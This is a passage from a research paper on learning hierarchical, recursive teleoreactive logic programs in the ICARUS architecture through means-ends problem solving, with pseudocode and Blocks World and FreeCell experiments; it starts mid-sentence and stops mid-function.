which can depend on the number of levels of recursion, nor do they state requirements. However, the head of each complex skill refers to some concept that the skill aims to achieve, an assumption Reddy and Tadepalli (1997) have also made in their research on task decomposition. This connection between skills and concepts constitutes a key difference between the current approach and our earlier work on hierarchical skills in ICARUS (Choi et al., 2004; Langley & Rogers, 2004), and it figures centrally in the learning methods we describe later. Table 3 presents some recursive skills for the Blocks World, including two clauses for achieving the concept clear. Teleoreactive logic programs are closely related to Nau et al.'s SHOP (1999) formalism for hierarchical task networks. This organizes knowledge into tasks, which serve as heads of clauses, and methods, which specify how to decompose tasks into subtasks.

Table 3: Some nonprimitive skills for the Blocks World domain that involve recursive calls. Each skill clause has a head that specifies the goal it achieves, a set of typed variables, one or more start conditions, and a set of ordered subskills. Numbers after the head distinguish different clauses that achieve the same goal.

Primitive methods describe the effects of basic actions, much like STRIPS operators. Each method also states its application conditions, which may involve predicates that are defined in logical axioms. In our framework, skill heads correspond to tasks, skill clauses are equivalent to methods, and concept definitions play the role of axioms.
In this mapping, teleoreactive logic programs are a special class of hierarchical task networks in which nonprimitive tasks always map onto declarative goals and in which top-level goals and the preconditions of primitive methods are always single literals. We will see that these two assumptions play key roles in our approach to problem solving and learning. Note that every skill/task S can be expanded into one or more sequences of primitive skills. For each skill S in a teleoreactive logic program, if S has concept C as its head, then every expansion of S into such a sequence must, if executed successfully, produce a state in which C holds. This constraint is weaker than the standard assumption made for macro-operators (e.g., Iba, 1988); it does not guarantee that, once initiated, the sequence will achieve C, since other events may intervene or the agent may encounter states in which one of the primitive skills does not apply. However, if the sequence of primitive skills can be run to completion, then it will achieve the goal literal C. The approach to learning that we report later is designed to acquire programs with this characteristic, and we give arguments to this effect at the close of Section 4. 3. Interpreting Teleoreactive Logic Programs As their name suggests, teleoreactive logic programs are designed for reactive execution in a goal-driven manner, within a physical setting that changes over time. As with most reactive controllers, the associated performance element operates in discrete cycles, but it also involves more sophisticated processing than most such frameworks. On each decision cycle, ICARUS updates a perceptual buffer with descriptions of all objects that are visible in the environment. Each such percept specifies the object’s type, a unique identifier, and zero or more attributes. For example, in the Blocks World these would include structures like (block A xpos 5 ypos 1 width 1 height 1). 
In this paper, we emphasize domains in which the agent perceives the same objects on successive time steps but in which some attributes change value. However, we will also consider teleoreactive systems for domains like in-city driving (Choi et al., 2004) in which the agent perceives different objects as it moves through the environment. Once the interpreter has updated the perceptual buffer, it invokes an inference module that elaborates on the agent’s perceptions. This uses concept definitions to draw logical conclusions from the percepts, which it adds to a conceptual short-term memory. This dynamic store contains higher-level beliefs, cast as relational literals, that are instances of generic concepts. The inference module operates in a bottom-up, data-driven manner that starts from descriptions of perceived objects, such as \( \text{block A xpos 5 ypos 1 width 1 height 1} \) and \( \text{block B xpos 5 ypos 0 width 1 height 1} \), matches these against the conditions in concept definitions, and infers beliefs about primitive concepts like \( \text{on A B} \). These trigger inferences about higher-level concepts, such as \( \text{clear A} \), which in turn support additional beliefs like \( \text{unstackable A B} \). This process continues until the agent has added all beliefs that are implied by its perceptions and concept definitions.\(^1\) After the inference module has augmented the agent’s perceptions with high-level beliefs, the architecture’s execution module inspects this information to decide what actions to take in the environment. To this end, it also examines its current goal, which must be encoded as an instance of some known concept, and its skills, which tell it how to accomplish such goals. Unlike inference, the execution process proceeds in a top-down manner, finding paths through the skill hierarchy that terminate in primitive skills with executable actions. 
We define a skill path to be a chain of skill instances that starts from the agent’s goal and descends through the hierarchy along subskill links, unifying the arguments of each subskill consistently with those of its parent. Furthermore, the execution module only considers skill paths that are applicable. This holds if no concept instance that corresponds to a goal along the path is satisfied, if the requirements of the terminal (primitive) skill instance are satisfied, and if, for each skill instance in the path not executed on the previous cycle, the start condition is satisfied. This last constraint is necessary because skills may take many cycles to achieve their desired effects, making it important to distinguish between their initiation and their continuation. To this end, the module retains the path through the skill hierarchy selected on the previous time step, along with the variable bindings needed to reconstruct it. For example, imagine a situation in which the block C is on B, B is on A, and A is on the table, in which the goal is \( \text{clear A} \), and in which the agent knows the primitive skills in Table 2 and the recursive skills in Table 3. Further assume that this is the first cycle, so that no previous activities are under way. In this case, the only path through the skill hierarchy is \( \{(\text{clear A} 4), \{(\text{unstackable B A) 3}, \{(\text{clear B) 1), \{(\text{unstack C B)\}} \} \). Applying the primitive skill \( \text{unstack C B)\} \) produces a new situation that leads to new inferences, and in which the only applicable path is \( \{(\text{clear A) 4}, \{(\text{unstackable B A) 3}, \{(\text{hand-empty} 2), \{(\text{putdown C T}\}) \). This enables a third path on the next cycle, \( \{(\text{clear A) 4}, \{(\text{unstack B A)}\} \), which generates a state in which the agent’s goal is satisfied. Note that this process operates much like the proof procedure in Prolog, except that it involves activities that extend over time. 
--- 1. Although this mechanism reasons over structures similar to Horn clauses, its operation is closer in spirit to the elaboration process in Soar (Laird et al., 1986) than to the query-driven reasoning in Prolog. Figure 1: Organization of modules for reactive execution, problem solving, and skill learning, along with their inputs and outputs. The interpreter incorporates two preferences that provide a balance between reactivity and persistence. First, given a choice between two or more subskills, it selects the first one for which the corresponding concept instance is not satisfied. This bias supports reactive control, since the agent reconsiders previously completed subskills and, if unexpected events have undone their effects, reexecutes them to correct the situation. Second, given a choice between two or more applicable skill paths, it selects the one that shares the most elements from the start of the path executed on the previous cycle. This bias encourages the agent to keep executing a high-level skill it has started until it achieves the associated goal or becomes inapplicable. Most research on reactive execution emphasizes dynamic domains in which unexpected events can occur that fall outside the agent’s control. Domains like the Blocks World do not have this character, but this does not mean one cannot utilize a reactive controller to direct behavior (e.g., see Fern et al., 2004). Moreover, we have also demonstrated (Choi et al., 2004) the execution module’s operation in the domain of in-city driving, which requires reactive response to an environment that changes dynamically. Our framework is relevant to both types of settings. To summarize, ICarus’ procedure for interpreting telereactive logic programs relies on two interacting processes – conceptual inference and skill execution. On each cycle, the architecture perceives objects and infers instances of conceptual relations that they satisfy. 
After this, it starts from the current goal and uses these beliefs to check the conditions on skill instances to determine which paths are applicable, which in turn constrains the actions it executes. The environment changes, either in response to these actions or on its own, and the agent begins another inference-execution cycle. This looping continues until the concept that corresponds to the agent’s top-level goal is satisfied, when it halts. 4. Solving Problems and Learning Skills Although one can construct telereactive logic programs manually, this process is time consuming and prone to error. Here we report an approach to learning such programs whenever the agent encounters a problem or subproblem that its current skills do not cover. In such cases, the architecture attempts to solve the problem by composing its primitive skills in a way that achieves the goal. Typically, this problem-solving process requires search and, given limited computational resources, may fail. However, when the effort is successful the agent produces a trace of the solution in terms of component skills that achieved the problem’s goal. The system transforms this trace into new skill clauses, which it adds to memory for use on future tasks. Figure 1 depicts this overall organization. As in some earlier problem-solving architectures like PRODIGY (Minton, 1988) and Soar (Laird et al., 1986), problem solving and learning are tightly linked and both are driven by impasses. A key difference is that, in these systems, learning produces search-control knowledge that makes future problem solving more effective, whereas in our framework it generates telereactive logic programs that the agent uses in the environment. Nevertheless, there remain important similarities that we discuss later at more length. 
4.1 Means-Ends Problem Solving As described earlier, the execution module selects skill clauses that should achieve the current goal and that have start conditions which match its current beliefs about the environment. Failure to retrieve such a clause produces an impasse that leads the architecture to invoke its problem-solving module. Table 4 presents pseudocode for the problem solver, which utilizes a variant of means-ends analysis (Newell & Simon, 1961) that chains backward from the goal. This process relies on a goal stack that stores both subgoals and skills that might accomplish them. The top-level goal is simply the lowest element on this stack. Despite our problem-solving method’s similarity to means-ends analysis, it differs from standard formulation in three important ways: - whenever the skill associated with the topmost goal on the stack becomes applicable, the system executes it in the environment, which leads to tight interleaving of problem solving and control; - both the start conditions of primitive skills (i.e., operators) and top-level goals must be cast as single relational literals, which may be defined concepts;\(^2\) - backward chaining can occur not only off the start condition of primitive skills but also off the definition of a concept, which means the single-literal assumption causes no loss of generality. As we will see shortly, the second and third of these assumptions play key roles in the mechanism for learning new skills, but we should first examine the operation of the problem-solving process itself. As Table 4 indicates, the problem solver pushes the current goal \(G\) onto the goal stack, then checks it on each execution cycle to determine whether it has been achieved. If so, then \(^2\) We currently define all concepts manually, but it would not be difficult to have the system define them automatically for operator preconditions and conjunctive goals. 
Table 4: Pseudocode for interleaving means-ends problem solving with skill execution. <table> <thead> <tr> <th>Solve(G)</th> </tr> </thead> <tbody> <tr> <td>Push the goal literal G onto the empty goal stack GS.</td> </tr> <tr> <td>On each cycle,</td> </tr> <tr> <td>If the top goal G of the goal stack GS is satisfied,</td> </tr> <tr> <td>Then pop GS.</td> </tr> <tr> <td>Else if the goal stack GS does not exceed the depth limit,</td> </tr> <tr> <td>Let S be the skill instances whose heads unify with G.</td> </tr> <tr> <td>If any applicable skill paths start from an instance in S,</td> </tr> <tr> <td>Then select one of these paths and execute it.</td> </tr> <tr> <td>Else let M be the set of primitive skill instances that</td> </tr> <tr> <td>have not already failed in which G is an effect.</td> </tr> <tr> <td>If the set M is nonempty,</td> </tr> <tr> <td>Then select a skill instance Q from M.</td> </tr> <tr> <td>Push the start condition C of Q onto goal stack GS.</td> </tr> <tr> <td>Else if G is a complex concept with the unsatisfied</td> </tr> <tr> <td>subconcepts H and with satisfied subconcepts F,</td> </tr> <tr> <td>Then if there is a subconcept I in H that has not yet failed,</td> </tr> <tr> <td>Then push I onto the goal stack GS.</td> </tr> <tr> <td>Else pop G from the goal stack GS.</td> </tr> <tr> <td>Store information about failure with G’s parent.</td> </tr> <tr> <td>Else pop G from the goal stack GS.</td> </tr> <tr> <td>Store information about failure with G’s parent.</td> </tr> </tbody> </table> the module pops the stack and focuses on G’s parent goal or, upon achieving the top-level goal, simply halts. If the current goal G is not satisfied, then the architecture retrieves all nonprimitive skills with heads that unify with G and, if any participate in applicable paths through the skill hierarchy, selects the first one found and executes it. 
This execution may require many cycles, but eventually it produces a new environmental state that either satisfies G or constitutes another impasse. If the problem solver cannot find any complex skills indexed by the goal G, it instead retrieves all primitive skills that produce G as one of their effects. The system then generates candidate instances of these skills by inserting known objects as their arguments. To select among these skill instances, it expands the instantiated start condition of each skill instance to determine how many of its primitive components are satisfied, then selects the one with the fewest literals unsatisfied in the current situation. If the candidates tie on this criterion, then it selects one at random. If the selected skill instance’s condition is met, the system executes the skill instance in the environment until it achieves the associated goal, which it then pops from the stack. If the condition is not satisfied, the architecture makes it the current goal by pushing it onto the stack. However, if the problem solver cannot find any skill clause that would achieve the current goal G, it uses G’s concept definition to decompose the goal into subgoals. If more than one subgoal is unsatisfied, the system selects one at random and calls the problem solver on it recursively, which makes it the current goal by pushing it onto the stack. This leads to chaining off the start condition of additional skills and/or the definitions of other concepts. Upon achieving a subgoal, the architecture pops the stack and, if other subconcepts remain unsatisfied, turns its attention to achieving them. Once all have been satisfied, this means the parent goal G has been achieved, so it pops the stack again and focuses on the parent. Of course, the problem-solving module must make decisions about which skills to select during skill chaining and the order in which it should tackle subconcepts during concept chaining. 
The system may well make the incorrect choice at any point, which can lead to failure on a given subgoal when no alternatives remain or when it reaches the maximum depth of the goal stack. In such cases, it pops the current goal, stores the failed candidate with its parent goals to avoid considering them in the future, and backtracks to consider other options. This strategy produces depth-first search through the problem space, which can require considerable time on some tasks. Figure 2 shows an example of the problem solver’s behavior on the Blocks World in a situation where block A is on the table, block B is on A, block C is on B, and the hand is empty. Upon being given the objective (clear A), the architecture looks for any executable skill with this goal as its head. When this fails, it looks for a skill that has the objective as one of its effects. In this case, invoking the primitive skill instance (unstack B A) would produce the desired result. However, this cannot yet be applied because its instantiated start condition, (unstackable B A), does not hold, so the system stores the skill instance with the initial goal and pushes this subgoal onto the stack. Next, the problem solver attempts to retrieve skills that would achieve (unstackable B A) but, because it has no such skills in memory, it resorts to chaining off the definition of unstackable. This involves three instantiated subconcepts – (clear), (on B A), and (hand-empty) – but only the first of these is unsatisfied, so the module pushes this onto the goal stack. In response, it considers skills that would produce this literal as an effect and retrieves the skill instance (unstack C B), which it stores with the current goal. In this case, the start condition of the selected skill, *(unstackable C B)*, already holds, so the architecture executes *(unstack C B)*, which alters the environment and causes the agent to infer *(clear B)* from its percepts. 
In response, it pops this goal from the stack and reconsiders its parent, *(unstackable B A)*. Unfortunately, this has not yet been achieved because executing the skill has caused the third of its component concept instances, *(hand-empty)*, to become false. Thus, the system pushes this onto the stack and, upon inspecting memory, retrieves the skill instance *(putdown C T)*, which it can and does execute. This second step achieves the subgoal *(hand-empty)*, which in turn lets the agent infer *(unstackable B A)*. Thus, the problem solver pops this element from the goal stack and executes the skill instance it had originally selected, *(unstack B A)*, in the new situation. Upon completion, the system perceives that the altered environment satisfies the top-level goal, *(clear A)*, which leads it to halt, since it has solved the problem. Both our textual description and the graph in Figure 2 represent the trace of successful problem solving: as noted earlier, finding such a solution may well involve search, but we have omitted missteps that require backtracking for the sake of clarity. Despite the clear evidence that humans often resort to means-ends analysis when they encounter novel problems (Newell & Simon, 1961), this approach to problem solving has been criticized in the AI planning community because it searches over a space of totally ordered plans. As a result, on problems for which the logical structure of a workable plan is only partially ordered, it can carry out extra work by considering alternative orderings that are effectively equivalent. However, the method also has clear advantages, such as low memory load because it must retain only the current stack rather than a partial plan. Moreover, it provides direct support for interleaving of problem solving and execution, which is desirable for agents that must act in their environment. 
Of course, executing a component skill before it has constructed a complete plan can lead the system into difficulty, since the agent cannot always backtrack in the physical world and can produce situations from which it cannot recover without starting over on the problem. In such cases, the problem solver stores the goal for which the executed skill caused trouble, along with everything below it in the stack. The system begins the problem again, this time avoiding the skill and selecting another option. If a different execution error occurs this time, the module again stores the problematic skill and its context, then starts over once more. In this way, the architecture continues to search the problem space until it achieves its top-level goal or exceeds the number of maximum allowed attempts.3 ### 4.2 Goal-Driven Composition of Skills Any method for learning teleoactive logic programs or similar structures must address three issues. First, it must determine the structure of the hierarchy that decomposes problems into subproblems. Second, the technique must identify when different clauses should have the same head and thus be considered in the same situations. Finally, it must infer the conditions under which to invoke each clause. The approach we describe here relies on results produced by the problem solver to answer these questions. Just as problem solving --- 3. The problem solver also starts over if it has not achieved the top-level objective within a given number of cycles. Jones and Langley (in press) report another variant of means-ends problem solving that uses a similar restart strategy but keeps no explicit record of previous failed paths. occurs whenever the system encounters an impasse, that is, a goal it cannot achieve by executing stored skills, so learning occurs whenever the system resolves an impasse by successful problem solving. 
The Icarus architecture shares this idea with earlier frameworks like Soar and Prodigy, although the details differ substantially. The response to the first issue is that hierarchical structure is determined by the subproblems handled during problem solving. As Figure 2 illustrates, this takes the form of a semilattice in which each subplan has a single root node. This structure follows directly from our assumptions that each primitive skill has one start condition and each goal is cast as a single literal. Because the problem solver chains backward off skill and concept definitions, the result is a hierarchical structure that suggests a new skill clause for each subgoal. Table 5 (a) presents the clauses that the system proposes based on the solution to the (clear A) problem, without specifying their heads or conditions. Figure 2 depicts the resulting hierarchical structure, using numbers to indicate the order in which the system generates each clause. The answer to the second question is that the head of a learned skill clause is the goal literal that the problem solver achieved for the subproblem that produced it. This follows from our assumption that the head of each clause in a teleo-reactive logic program specifies some concept that the clause will produce if executed. At first glance, this appears to confound skills with concepts, but another view is that it indexes skill clauses by the concepts they achieve. Table 5 (b) shows the clauses learned from the problem-solving trace in Figure 2 once the heads have been inserted. Note that this strategy leads directly to the creation of recursive skills whenever a conceptual predicate P is the goal and P also appears as a subgoal. In this example, because (clear A) is the top-level goal and (clear B) occurs as a subgoal, one of the clauses learned for clear is defined recursively, although this happens indirectly through unstackable. 
Clearly, introducing recursive statements can easily lead to overly general or even non-terminating programs. Our approach avoids the latter because the problem solver never considers a subgoal if it already occurs earlier in the goal stack; this ensures that subgoals which involve the same predicate always have different arguments. However, we still require some means to address the third issue of determining conditions on learned clauses that guards against the danger of overgeneralization. The response differs depending on whether the problem solver resolves an impasse by chaining backward on a primitive skill or by chaining on a concept definition. Suppose the agent achieves a subgoal G through skill chaining, say by first applying skill S_1 to satisfy the start condition for S_2 and executing the skill S_2, producing a clause with head G and ordered subskills S_1 and S_2. In this case, the start condition for the new clause is the same as that for S_1, since when S_1 is applicable, the successful completion of this skill will ensure the start condition for S_2, which in turn will achieve G. This differs from traditional methods for constructing macro-operators, which analytically combine the preconditions of the first operator and those preconditions of later operators it does not achieve. However, S_1 was either selected because it achieves S_2’s start condition or it was learned during its achievement, both of which mean that S_1’s start condition is sufficient for the composed skill. 4 4. If skill S_2 is executed without invoking another skill to meet its start condition, the method creates a new clause, with S_2 as its only subskill, that restates the original skill in a new form with G in its head. Table 5: Skill clauses for the Blocks World learned from the trace in Figure 2 (a) after hierarchical structure has been determined, (b) after the heads have been identified, and (c) after the start conditions have been inserted. 
Numbers after the heads indicate the order in which clauses are generated. <table> <thead> <tr> <th>(a)</th> <th>(head) 1</th> <th>(head) 3</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(b)</th> <th>((clear ?B) 1</th> <th>((unstackable ?B ?A) 3</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(c)</th> <th>((hand-empty) 2</th> <th>((clear ?A) 4</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(b)</th> <th>((hand-empty) 2</th> <th>((clear ?A) 4</th> </tr> </thead> <tbody> <tr> <td>:start</td> <td>&lt;conditions&gt;</td> <td>:start</td> </tr> </tbody> </table> In contrast, suppose the agent achieves a goal concept $G$ through concept chaining by satisfying the subconcepts $G_{k+1}, \ldots, G_n$, in that order, while subconcepts $G_1, \ldots, G_k$ were true at the outset. In response, the system would construct a new skill clause with head $G$ and the ordered subskills $G_{k+1}, \ldots, G_n$, each of which the system already knew and used to achieve the associated subgoal or which it learned from the successful solution of one of the subproblems. In this case, the start condition for the new clause is the conjunction of subgoals that were already satisfied beforehand. This prevents execution of the learned clause when some of $G_1, \ldots, G_k$ are not satisfied, in which case the sequence $G_{k+1}, \ldots, G_n$ may not achieve the goal $G$. Table 6 gives pseudocode that summarizes both methods for determining the conditions on new clauses. Table 6: Pseudocode for creation of skill clauses through goal-driven composition. Learn(G) If the goal G involves skill chaining, Then let S1 and S2 be G’s first and second subskills. 
If subskill S1 is empty, Then create a new skill clause N with head G, with the head of S2 as the only subskill, and with the same start condition as S2. Return the literal for skill clause N. Else create a new skill clause N with head G, with the heads of S1 and S2 as ordered subskills, and with the same start condition as S1. Return the literal for skill clause N. Else if the goal G involves concept chaining, Then let C1, ..., Cn be G’s initially satisfied subconcepts. Let C_{k+1}, ..., Cn be G’s stored subskills. Create a new skill clause N with head G, with C_{k+1}, ..., Cn as ordered subskills, and with C1, ..., Ck as start conditions. Return the literal for skill clause N. Table 5 (c) presents the conditions learned for each of the skill clauses learned from the trace in Figure 2. Two of these (clauses 1 and 2) are trivial because they result from degenerate subproblems that the system solves by chaining off a single primitive operator. Another skill clause (3) is more interesting because it results from chaining off the concept definition for unstackable. This has the start conditions (on ?A ?B) and (hand-empty) because the subconcept instances (on A B) and (hand-empty) held at the outset.5 The final clause (4) is most intriguing because it results from using a learned clause (3) followed by the primitive skill instance (unstack B A). In this case, the start condition is the same as that for the first subskill clause (3). Upon initial inspection, the start conditions for clause 3 for achieving unstackable may appear overly general. However, recall that the skill clauses in a teleoactive logic program are interpreted not in isolation but as parts of chains through the skill hierarchy. The interpreter will not select a path for execution unless all conditions along the path from the top clause to the primitive skill are satisfied. This lets the learning method store very abstract conditions for new clauses with less danger of overgeneralization. 
On reflection, this scheme is the only one that makes sense for recursive control programs, since static preconditions cannot characterize such structures. Rather, the architecture must compute appropriate preconditions dynamically, depending on the depth of recursion. The Prolog-like interpreter used for skill selection provides this flexibility and guards against overly general behavior. We refer to the learning mechanism that embodies these answers as goal-driven composition. This process operates in a bottom-up fashion, with new skills being formed whenever a goal on the stack is achieved. The method is fully incremental, in that it learns from sin- --- 5. Although primitive skills have only one start condition, we do not currently place this constraint on learned clauses, as they are not used in problem solving and it makes acquired programs more readable. Table 7: Pseudocode for interleaved problem solving and execution extended to support goal-driven composition of skills. New steps are indicated in italic font. Solve(G) Push the goal literal G onto the empty goal stack GS. On each cycle, If the top goal G of the goal stack GS is satisfied, Then pop GS and let New be Learn(G). If G’s parent P involved skill chaining, Then store New as P’s first subskill Else if G’s parent P involved concept chaining, Then store New as P’s next subskill Else if the goal stack GS does not exceed the depth limit, Let S be the skill instances whose heads unify with G. If any applicable skill paths start from an instance in S, Then select one of these paths and execute it. Else let M be the set of primitive skill instances that have not already failed in which G is an effect. If the set M is nonempty, Then select a skill instance Q from M. Push the start condition C of Q onto goal stack GS. Store Q with goal G as its last subskill. Mark goal G as involving skill chaining. 
Else if G is a complex concept with the unsatisfied subconcepts H and with satisfied subconcepts F, Then if there is a subconcept I in H that has not yet failed, Then push I onto the goal stack GS. Store F with G as its initially true subconcepts. Mark goal G as involving concept chaining. Else pop G from the goal stack GS. Store information about failure with G’s parent. Else pop G from the goal stack GS. Store information about failure with G’s parent. Single training cases, and it is interleaved with problem solving and execution. The technique shares this characteristic with analytical methods for learning from problem solving, such as those found in Soar and PRODIGY. But unlike these methods, it learns hierarchical skills that decompose problems into subproblems, and, unlike most methods for forming macro-operators, it acquires disjunctive and recursive skills. Moreover, learning is cumulative in that skills learned from one problem are available for use on later tasks. Taken together, these features make goal-driven composition a simple yet powerful approach to learning logic programs for reactive control. Nor is the method limited to working with means-ends analysis; it should operate over traces of any planner that chains backward from a goal. The architecture’s means-ends module must retain certain information during problem solving to support the composition of new skill clauses. Table 7 presents expanded pseudocode that specifies this information and when the system stores it. The form and content is similar to that recorded in Veloso and Carbonell’s (1993) approach to derivational analogy. The key difference is that their system stores details about subgoals, operators, and preconditions in specific cases that drive future problem solving, whereas our approach transforms these instances into generalized hierarchical structures for teleoreactive control. 
We should clarify that the current implementation invokes a learned clause only when it is applicable in the current situation, so the problem solver never chains off its start conditions. Mooney (1989) incorporated a similar constraint into his work on learning macro-operators to avoid the utility problem (Minton, 1990), in which learned knowledge reduces search but leads to slower behavior. However, we have extended his idea to cover cases in which learned skills can solve subproblems, which supports greater transfer across tasks. In our framework, this assumption means that clauses learned from skill chaining have a left-branching structure, with the second subskill being primitive. In Section 2, we stated that every skill clause in a teleoactive logic program can be expanded into one or more sequences of primitive skills, and that each sequence, if executed legally, will produce a state that satisfies the clause’s head concept. Here we argue that goal-driven composition learns sets of skill clauses for which this condition holds. As in most research on planning, we assume that the preconditions and effects of primitive skills are accurate, and also that no external forces interfere. First consider a clause with the head $H$ that has been created as the result of successful chaining off a primitive skill. This learned clause is guaranteed to achieve the goal concept $H$ because $H$ must be an effect of its final subskill or the chaining would never have occurred. Now consider a clause with the head $H$ that has been created as the result of successful chaining off a conjunctive definition of the concept $H$. This clause describes a situation in which some subconcepts of $H$ hold but others must still be achieved to make $H$ true. 
Some subconcepts may become unsatisfied in the process and need to be reachieved, but the ordering on subgoals found during problem solving worked for the particular objects involved, and replacing constants with variables will not affect the result. Thus, if the clause's start conditions are satisfied, achieving the subconcepts in the specified order will achieve $H$. Remember that, unlike methods for learning macro-operators, our method does not guarantee that a given clause expansion will run to completion. Whether this occurs in a given domain is an empirical question, to which we now turn.

5. Experimental Studies of Learning

As previously reported (Choi & Langley, 2005), the means-ends problem solving and learning mechanisms just described construct properly organized teleoreactive logic programs. After learning, the agent can simply retrieve and execute the acquired programs to solve similar problems without falling back on problem solving. Here we report promising results from more systematic and extensive experiments. The first two studies involve inherently recursive but nondynamic domains, whereas the third involves a dynamic driving task.

5.1 Blocks World

The Blocks World involves an infinitely large table with cubical blocks, along with a manipulator that can grasp, lift, carry, and ungrasp one block at a time. In this domain, we wrote an initial program with nine concepts and four primitive skills. Additionally, we provided a concept for each of four different goals.⁶ Theoretically, this knowledge is sufficient to solve any problem in the domain, but the extensive search required would make it intractable to solve tasks with many blocks using only basic knowledge. In fact, only 20 blocks are enough to make the system search for half an hour.

---
6. These concerned achieving situations in which a given block is clear, one block is on another, one block is on another and a third block is on the table, and three blocks are arranged in a tower.
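As noted earlier, every clause in a teleoreactive logic program expands into one or more sequences of primitive skills. A toy interpreter makes this concrete; the clause encoding below (a map from skill heads to ordered subskill lists) and the skill names are our own assumptions, and the sketch handles only nonrecursive clauses, since in the full system the termination of recursive expansions depends on the environment.

```python
def expand(skill, clauses):
    """Expand a hierarchical skill into one left-to-right sequence of
    primitive skills. `clauses` maps each nonprimitive skill head to a
    list of alternative bodies (ordered subskill lists); anything not in
    the map is treated as primitive. Only the first clause per head is
    used here, for simplicity."""
    if skill not in clauses:
        return [skill]              # primitive skills expand to themselves
    sequence = []
    for subskill in clauses[skill][0]:
        sequence.extend(expand(subskill, clauses))
    return sequence

# A toy Blocks World-style program: 'on' and 'clear' are learned heads,
# the rest are primitives (names are illustrative, not from Table 3).
toy_program = {
    'on':    [['clear', 'pickup', 'stack']],
    'clear': [['unstack', 'putdown']],
}
```

For instance, `expand('on', toy_program)` yields the primitive sequence `['unstack', 'putdown', 'pickup', 'stack']`.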
Therefore, we wanted the system to learn teleoreactive logic programs that it could execute recursively to solve problems with arbitrary complexity. We have already discussed a recursive program acquired from one training problem, which requires clearing the lowest object in a stack of three blocks, but many other tasks are possible. To establish that the learned programs actually help the architecture to solve more complex problems, we ran an experiment that compared the learning and nonlearning versions. We presented the system with six ten-problem sets of increasing complexity, one after another. More specifically, we used sets of randomly generated problems with 5, 10, 15, 20, 25, and 30 blocks. If the goal-driven composition mechanism is effective, then it should produce noticeable benefits in harder tasks when learning is active. We carried out 200 runs with different randomized orders within levels of task difficulty. In each case, we let the system run a maximum of 50 decision cycles before starting over on a problem, and let it attempt a task at most five times before giving up. For this domain, we set the maximum depth of the goal stack used in problem solving to eight. Figure 3 displays the number of execution cycles and the CPU time required for both conditions, which show strong benefits from learning. With number of cycles as the performance measure, we see a systematic decrease as the system gains more experience. Every tenth problem introduces five additional objects, but the learning system requires no extra effort to solve them. The architecture has constructed general programs that let it achieve familiar goals for arbitrary numbers of blocks without resorting to deliberative problem solving. Inspection reveals that it acquires the nonprimitive skill clauses in Table 3, as well as additional ones that make recursive calls. In

Table 8: Aggregate scaling results for the Blocks World.
<table>
<thead>
<tr>
<th rowspan="2">Blocks</th>
<th colspan="2">Learning</th>
</tr>
<tr>
<th>cycles</th>
<th>CPU</th>
</tr>
</thead>
<tbody>
<tr><td>5</td><td>21.25</td><td>4.03</td></tr>
<tr><td>10</td><td>13.61</td><td>6.90</td></tr>
<tr><td>15</td><td>11.22</td><td>11.13</td></tr>
<tr><td>20</td><td>9.76</td><td>16.09</td></tr>
<tr><td>25</td><td>11.04</td><td>27.41</td></tr>
<tr><td>30</td><td>11.67</td><td>40.85</td></tr>
</tbody>
</table>

contrast, the nonlearning system requires more decision cycles on harder problems, although this levels off later in the curve, as the problem solver gives up on very difficult tasks. The results for solution time show similar benefits, with the learning condition substantially outperforming the nonlearning one. However, the figure also indicates that even the learning version slows down somewhat as it encounters problems with more blocks. Analysis of individual runs suggests this results from the increased cost of matching against objects in the environment, which is required in both the learning and nonlearning conditions. This poses an issue, not for our approach to skill construction but for our architectural framework, so it deserves attention in future research. Table 8 shows the average results for each level of problem complexity, including the probability that the system can solve a problem within the allowed number of cycles and attempts. In addition to presenting the first two measures at more aggregate levels, it also reveals that, without learning, the chances of finding a solution decrease with the number of blocks in the problem. Letting the system carry out more search would improve these scores, but only at the cost of increasing the number of cycles and CPU time needed to solve the more difficult problems.
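The run protocol used in these experiments (a fixed cycle cap per attempt and a bounded number of attempts per task) can be sketched as a driver loop. The `solve_step` callback below is a hypothetical stand-in for one decision cycle of the architecture, not its real interface.

```python
def run_task(solve_step, max_cycles=50, max_attempts=5):
    """Experimental protocol (sketch): restart a task after max_cycles
    decision cycles, and give up entirely after max_attempts tries.
    `solve_step` returns True on the cycle when the goal concept holds.
    The defaults mirror the Blocks World settings described above."""
    for attempt in range(1, max_attempts + 1):
        for cycle in range(1, max_cycles + 1):
            if solve_step():
                return {'solved': True, 'attempt': attempt, 'cycles': cycle}
    return {'solved': False, 'attempt': max_attempts, 'cycles': max_cycles}
```

For the FreeCell runs of Section 5.2, the same loop would use caps of 1000 cycles and five attempts.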
5.2 FreeCell Solitaire

FreeCell is a solitaire game with eight columns of stacked cards, all face up and visible to the player, that has been used in AI planning competitions (Bacchus, 2001). There are four free cells, each of which can hold a single card, and four home cells that correspond to the four suits. The goal is to move all the cards from the eight columns to the home cells for their suits in ascending order. The player can move only the cards on top of the eight columns and the ones in the free cells. Each card can be moved to a free cell, to the proper home cell, or to an empty column. In addition, the player can move a card onto a column whose top card has the next-higher rank and the opposite color. As in the Blocks World, we provided a simulated environment that allows legal moves and updates the agent's perceptions. For this domain, we provided the architecture with an initial program that involves 24 concepts and 12 primitive skills and that should, in principle, let it solve any initial configuration with a feasible solution path. (Most but not all FreeCell problems are solvable.) However, the agent may find a solution only after a significant amount of search using its means-ends problem solver. Again, we wanted the system to learn teleoreactive logic programs that it could execute on complex FreeCell problems with little or no search. In this case, we presented tasks as a sequence of five 20-problem sets with 8, 12, 16, 20, and 24 cards. On each problem, we let the system run at most 1000 decision cycles before starting over, attempt the task no more than five times before halting, and create goal stacks up to 30 in depth. We ran both the learning and nonlearning versions on 300 sets of randomly generated problems and averaged the results. Figure 4 shows the number of cycles and the CPU time required to solve tasks as a function of the number of problems encountered.
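The move legality rules just described are concrete enough to state as code. This sketch uses an ad hoc `(rank, suit)` card encoding of our own; it is not the simulated environment used in the experiments.

```python
# Legality of the FreeCell move types described above, as a sketch.
# Cards are (rank, suit) pairs with rank 1 (ace) through 13 (king).

RED_SUITS = {'hearts', 'diamonds'}

def color(card):
    """Red for hearts/diamonds, black for clubs/spades."""
    return 'red' if card[1] in RED_SUITS else 'black'

def can_move_to_column(card, column):
    """A card may go on an empty column, or on a top card of the
    next-higher rank and the opposite color."""
    if not column:
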